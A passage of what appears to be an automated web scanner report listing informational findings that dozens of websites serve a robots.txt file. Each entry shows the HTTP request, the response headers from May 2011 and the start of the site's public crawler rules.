26.805. http://www.playsportstv.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playsportstv.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.playsportstv.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:08:30 GMT
Server: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6.4 mod_ssl/2.2.4 OpenSSL/0.9.8e JRun/4.0
Set-Cookie: CFID=12492690;expires=Thu, 25-Apr-2041 11:08:31 GMT;path=/
Set-Cookie: CFTOKEN=6c76ecd447420d88-B58B84C5-92C9-9AAF-1A8D7FADB62F21DC;expires=Thu, 25-Apr-2041 11:08:31 GMT;path=/
Set-Cookie: JSESSIONID=26301449b2e4f373b76b44123f323b4c83b2;path=/
Connection: close
Content-Type: text/html; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /pages/privacy
Disallow: /pages/terms
Disallow: /pages/faq
Disallow: /pages/important-safety-information
Disallow: /pages/help
Disallow: /pages/contact
Disallo
...[SNIP]...

26.806. http://www.pmwf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pmwf.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pmwf.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:08 GMT
Server: Apache/2.2.17
Last-Modified: Mon, 10 May 2010 05:09:40 GMT
ETag: "1b-486366a806d00"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

26.807. http://www.pocketables.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pocketables.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pocketables.net

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web049
X-Webserver: oak-tp-web049
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Tue, 03 May 2011 10:28:04 GMT
X-Varnish: 3604296915 2662397581
Age: 992934
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Allow: /.m/
Disallow: /

User-agent: Y!J-SRD
Allow: /.m/
Dis
...[SNIP]...

26.808. http://www.podfeed.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.podfeed.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.podfeed.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 441
Content-Type: text/plain
Last-Modified: Tue, 12 Apr 2011 17:16:26 GMT
Accept-Ranges: bytes
ETag: "cb6e3a5b35f9cb1:a2e"
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:17:11 GMT
Connection: close

User-agent: *
Disallow: /admin0/
Disallow: /images/
Disallow: /remove_my_podfeed_item.asp
Disallow: /add_my_podfeed_item.asp
Disallow: /post_tag.asp
Disallow: /pf2/
Disallow: /includes/
Disall
...[SNIP]...

26.809. http://www.poker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.poker.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.poker.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:19:41 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.5 with Suhosin-Patch
Last-Modified: Thu, 19 Jun 2008 06:14:51 GMT
ETag: "c2cb4d-18-e51cccc0"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

26.810. http://www.pokerlistings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pokerlistings.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pokerlistings.com

Response

HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Encoding
Cache-Control: no-cache, max-age=0, must-revalidate
Age: 2265
Content-Length: 1823
Date: Tue, 03 May 2011 10:23:34 GMT
Connection: close
X-Cache: HIT
X-Varnish: 1002167810 1002156485
Server: Apache/2.2.13 (EL)
X-Powered-By: PHP/5.2.11
Content-Type: text/plain; charset="utf-8"
Pragma: no-cache
Via: 1.1 varnish

User-agent: *
Disallow: /content/
Disallow: /download/
Disallow: /play/
Disallow: /campagnes/
Disallaow: /pokerlistings-tools/
Disallow: /poker-glossary*
Disallow: *print=true
Disallow: *review=summar
...[SNIP]...

26.811. http://www.polarispartshouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polarispartshouse.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.polarispartshouse.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 20 Mar 2008 14:43:36 GMT
Accept-Ranges: bytes
ETag: "1c4f96c7988ac81:62d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:14:47 GMT
Connection: close

User-agent: *

Disallow:

26.812. http://www.pollhost.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pollhost.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pollhost.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:47:48 GMT
Server: Apache
Last-Modified: Mon, 18 Aug 2003 04:35:43 GMT
ETag: "9459461-25-88fde5c0"
Accept-Ranges: bytes
Content-Length: 37
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver
Disallow: /

26.813. http://www.poolgeek.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.poolgeek.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.poolgeek.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 12 Apr 2011 12:51:13 GMT
Accept-Ranges: bytes
ETag: "72694f4e10f9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:32:07 GMT
Connection: close
Content-Length: 393

User-Agent: *
Disallow: /Admin/
Disallow: /App_Themes/
Disallow: /Assets/
Disallow: /Checkout/
Disallow: /ClientApi/
Disallow: /ConLib/
Disallow: /FCKeditor/
Disallow: /images/
Disallow: /Ins
...[SNIP]...

26.814. http://www.poorfish.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.poorfish.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.poorfish.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Mon, 18 Oct 2010 15:55:32 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Date: Tue, 03 May 2011 10:18:49 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
Disallow: /ASPDNSFGateways/
Disallow: /ASPDNSFPatterns/
Disallow: /ASPDNSFQuickBooks/
Disallow: /bin/
Disallow: /categorydescr
...[SNIP]...

26.815. http://www.popupbooster.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popupbooster.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popupbooster.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:01:36 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 12 Sep 2010 12:10:17 GMT
ETag: "a56c012-1a7-4900edce85c40"
Accept-Ranges: bytes
Content-Length: 423
Connection: close
Content-Type: text/plain; charset=iso-8859-1

# Default modx exclusions
User-agent: *
Disallow: /assets/cache/
Disallow: /assets/docs/
Disallow: /assets/export/
Disallow: /assets/import/
Disallow: /assets/modules/
Disallow: /assets/plugins/
Disal
...[SNIP]...

26.816. http://www.portableairshop.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.portableairshop.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.portableairshop.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:28:39 GMT
Server: Apache
Content-Length: 90
Cache-Control: public;max-age=76168
Expires: Wed, 04 May 2011 07:38:07 GMT
Last-Modified: Wed, 27 Apr 2011 17:51:02 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain

# Production Robots.txt file. Used to allow robots to crawl.

User-Agent: *
Allow: /

26.817. http://www.portalprogramas.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.portalprogramas.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.portalprogramas.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:02 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 16:17:46 GMT
ETag: "68800d-11c-22bb9e80"
Accept-Ranges: bytes
Content-Length: 284
Cache-Control: max-age=86400
Expires: Wed, 04 May 2011 10:52:02 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /inc/
Disallow: /encuestas/
Disallow: /online/
Disallow: /js/Disallow: /recurso.php
Disallow: /boletines/
Disallow: /premios-mejo
...[SNIP]...

26.818. http://www.postvac.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.postvac.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.postvac.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:59:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://postvac.com/xmlrpc.php
Set-Cookie: PHPSESSID=433489cf5fbbec6424c4966cd68c4c48; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://postvac.com/sitemap.xml.gz

26.819. http://www.powerboatlistings.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.powerboatlistings.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.powerboatlistings.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:29 GMT
Server: Apache
Last-Modified: Fri, 12 Mar 2010 07:28:32 GMT
Accept-Ranges: bytes
Content-Length: 59
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /contact/
Disallow: /report-abuse/

26.820. http://www.ppcgeeks.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ppcgeeks.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ppcgeeks.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 11:41:33 GMT
Content-Type: text/plain
Content-Length: 1213
Last-Modified: Thu, 14 Jan 2010 23:46:44 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /forums/ajax.php
Disallow: /forums/attachment.php
Disallow: /forums/calendar.php
Disallow: /forums/cron.php
Disallow: /forums/editpost.php
Disallow: /forums/global.php
Disallow
...[SNIP]...

26.821. http://www.pponline.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pponline.co.uk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pponline.co.uk

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:28:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Apr 2011 13:38:48 GMT
Accept-Ranges: bytes
Content-Length: 2781
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:28:33 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.7.2.3 2008/12/10 20:24:38 drumm Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by site
...[SNIP]...

26.822. http://www.preloved.co.uk/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.preloved.co.uk
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.preloved.co.uk

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 11:00:30 GMT
Server: Microsoft-IIS/6.0
Cache-Control: private
X-Server: www1
Accept-Ranges: bytes
ETag: W/"2061-1302622613727"
Last-Modified: Tue, 12 Apr 2011 15:36:53 GMT
Content-Type: text/plain
Content-Length: 2061

User-agent: *
# Need to log in to see these so no point in spidering
Disallow: /fuseaction-respondtoadvert.default/
Disallow: /fuseaction-respondtoadvert.viewprofile/
Disallow: /fuseaction-respond
...[SNIP]...

26.823. http://www.prensaescrita.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prensaescrita.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prensaescrita.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 20 Feb 2010 12:13:58 GMT
ETag: "57d8a0b-56-4800722740d80"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain

...User-agent: *
Disallow: /nuevo.php?
Disallow: /diarios.php?
Disallow: /adiario.php?

26.824. http://www.presidentsusa.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.presidentsusa.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.presidentsusa.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:15 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Thu, 02 Apr 2009 16:58:44 GMT
ETag: "b415e659-52-46695584f14ad"
Cache-Control: max-age=14400, public
Expires: Tue, 03 May 2011 12:31:47 GMT
Content-Length: 82
Accept-Ranges: bytes
Age: 6629

# robots.txt for http://www.presidentsusa.net/

User-agent: *
Disallow: /i/ #

26.825. http://www.priestsforlife.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.priestsforlife.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.priestsforlife.org

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 30 Aug 2010 14:37:29 GMT
Accept-Ranges: bytes
ETag: "bd41a2df5048cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:32:24 GMT
Connection: close
Content-Length: 144

...User-agent: *
Disallow: /_borders/
Disallow: /_fpclass/
Disallow: /_overlay/
Disallow: /_private/
Disallow: /_themes/
Disallow: /admin/

26.826. http://www.printsmadeeasy.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.printsmadeeasy.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.printsmadeeasy.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:31:32 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a
Last-Modified: Sat, 01 Aug 2009 12:17:27 GMT
ETag: "1249129047-157"
Accept-Ranges: bytes
Content-Length: 157
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive, close
Cache-Control: max-age=1200
Expires: Tue, 03 May 2011 10:51:32 GMT
Content-Type: text/plain

# /robots.txt file for http://www.PrintsMadeEasy.com/
# mail webmaster@PrintsMadeEasy.com for constructive criticism

User-agent: *
Disallow: /cgi-bin/

26.827. http://www.produceoasis.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.produceoasis.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.produceoasis.com

Response

HTTP/1.1 200 OK
Content-Length: 631
Content-Type: text/plain
Content-Location: http://www.produceoasis.com/robots.txt
Last-Modified: Fri, 04 Dec 2009 19:03:58 GMT
Accept-Ranges: bytes
ETag: "ca29e4881475ca1:243"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:33:32 GMT
Connection: close

# robots.txt for www.produceoasis.com ########################
#
# Created: 2006-12-29
# Issued: 2006-12-29
# Modified: 2009-12-4
#
#########################################################
...[SNIP]...

26.828. http://www.promarkresearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.promarkresearch.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.promarkresearch.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:58 GMT
Server: Apache
Last-Modified: Mon, 10 Aug 2009 23:54:49 GMT
ETag: "536dc6-130-470d24faca440"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

26.829. http://www.promgirl.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.promgirl.net
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.promgirl.net

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:35:49 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Tue, 03 May 2011 12:35:49 GMT
Last-Modified: Tue, 19 Apr 2011 05:04:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Connection: close
Content-Type: text/plain

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...

26.830. http://www.propertyqube.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.propertyqube.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.propertyqube.com

Response

HTTP/1.1 200 OK
Content-Length: 25
Content-Type: text/plain
Content-Location: http://www.propertyqube.com/robots.txt
Last-Modified: Thu, 12 Jun 2008 04:36:24 GMT
Accept-Ranges: bytes
ETag: "cde7b1de45ccc81:109c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:19:00 GMT
Connection: close

User-agent: *
Disallow:

26.831. http://www.prosolutionpills.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prosolutionpills.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prosolutionpills.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:19:56 GMT
Server: Apache
Last-Modified: Thu, 17 Feb 2011 17:55:48 GMT
ETag: "1fd69-17-49c7e1b7f9100"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.832. http://www.prostate-massage-and-health.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prostate-massage-and-health.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prostate-massage-and-health.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:16:30 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.prostate-massage-and-health.com/iq4ggNTV.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Dis
...[SNIP]...

26.833. http://www.protherapysupplies.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.protherapysupplies.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.protherapysupplies.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:22 GMT
Server: Apache
Cache-Control: max-age=604800
Content-Length: 80
NS_RTIMER_COMPOSITE: -1740661460:73686F702D6A6176613034312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2010.2.0; domain=www.protherapysupplies.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=1000
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /core/media/
Disallow: /s.nl/
Allow: /

Crawl-Delay: 10

26.834. http://www.prudentialhomesale.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.prudentialhomesale.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prudentialhomesale.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:46 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.3.1
Last-Modified: Wed, 02 Jun 2010 03:31:19 GMT
ETag: "6f-b91fefc0"
Accept-Ranges: bytes
Content-Length: 111
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI CURa ADMa CAO DEVa TAIa OUR BUS IND UNI COM PSA NAV INT"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /listings/
Disallow: /myaccount/
Disallow: /contact/
Disallow: /company/disclaimer.php

26.835. http://www.psoklahoma.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.psoklahoma.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.psoklahoma.com

Response

HTTP/1.1 200 OK
Content-Length: 76
Content-Type: text/plain
Last-Modified: Thu, 04 Nov 2010 17:37:23 GMT
Accept-Ranges: bytes
ETag: "7e108df0467ccb1:7938"
Server: Microsoft-IIS/6.0
IISExport: This web site was exported using IIS Export v4.1
IISExport: This web site was exported using IIS Export v4.2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:13:40 GMT
Connection: close

# keep mobile material from being indexed
User-agent: *
Disallow: /mobile/

26.836. http://www.psoriasis.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.psoriasis.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.psoriasis.org

Response

HTTP/1.1 200 OK
Content-Length: 592
Content-Type: text/plain
Last-Modified: Fri, 11 Mar 2011 20:01:29 GMT
Accept-Ranges: bytes
ETag: "586f291c27e0cb1:1747"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:22:41 GMT
Connection: close

User-agent: *
Disallow: /NetCommunity/Document.Doc?id=893
Disallow: /NetCommunity/Document.Doc?id=752
Disallow: /NetCommunity/Document.Doc?id=751
Disallow: /NetCommunity/Document.Doc?id=753
Disal
...[SNIP]...

26.837. http://www.publicbookshelf.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.publicbookshelf.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicbookshelf.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:04:12 GMT
Server: Apache
Last-Modified: Sun, 30 Nov 2003 00:56:44 GMT
ETag: "20c40b-24-3cd4c9957ab00"
Accept-Ranges: bytes
Content-Length: 36
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /include/

26.838. http://www.purplepug.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.purplepug.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purplepug.com

Response

HTTP/1.0 200 OK
Server: Apache
X-S: 27.182:31731
X-Powered-By: SmugMug/0.9
X-SmugMug-Hiring: How to love what you do: http://www.smugmug.com/jobs/
X-SmugMug-Values: 4/4 - It's the product, stupid
Cache-Control: private, no-store, no-cache, max-age=1, must-revalidate
Expires: Tue, 03 May 2011 10:59:34 GMT
ETag: "18e4af93e0ec6b97c155dc9550adb466"
Content-Type: text/plain; charset=utf-8
Date: Tue, 03 May 2011 10:59:33 GMT
Content-Length: 3663
Connection: close

# If you're reading this, you belong at a job you love: http://www.smugmug.com/jobs/
# See http://www.smugmug.com/help/emailreal if you'd like to apply to be whitelisted for crawling this site

User-a
...[SNIP]...

26.839. http://www.pusd.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pusd.org
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pusd.org

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:22:57 GMT
Server: Apache
Last-Modified: Mon, 19 Mar 2007 17:00:01 GMT
ETag: "168-42c0a8516c640"
Accept-Ranges: bytes
Content-Length: 360
Cache-Control: max-age=43200
Expires: Tue, 03 May 2011 23:37:50 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *

Disallow: /education/admin/
Disallow: /local/admin/
Disallow: /education/graphics/
Disallow: /local/graphics/
Disallow: /education/includes/
Disallow: /local/includes/
Disallow: /educat
...[SNIP]...

26.840. http://www.q1medicare.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.q1medicare.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.q1medicare.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:51:13 GMT
Server: Apache/2.2.17
Last-Modified: Wed, 07 Sep 2005 16:48:16 GMT
ETag: "a3-400314f9e1400"
Accept-Ranges: bytes
Content-Length: 163
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.searchengineworld.com
# Questions: please contact site administrator
# All robots will spider the domain

User-agent: *
Disallow:

26.841. http://www.qualys.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qualys.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qualys.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Tue, 03 May 2011 10:34:39 GMT
Connection: Keep-Alive
Via: NS-CACHE-8.0: 1
Server: corpweb/3.3a.QEL4
Vary: *
Last-Modified: Mon, 23 Nov 2009 22:24:38 GMT
Accept-Ranges: bytes
Content-Length: 187
Keep-Alive: timeout=15, max=39
Content-Type: text/plain

User-agent: *
Disallow: /forms/freescan/
Disallow: /forms/keywords/
Disallow: /docs/VM-for-Dummies.pdf
Disallow: /docs/PCI-for-Dummies.pdf
Disallow: /docs/Qualys_VM_Buyers_Checklist.pdf

26.842. http://www.racerxonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.racerxonline.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.racerxonline.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:23:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 17 Mar 2011 15:41:45 GMT
Accept-Ranges: bytes
Content-Length: 46
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
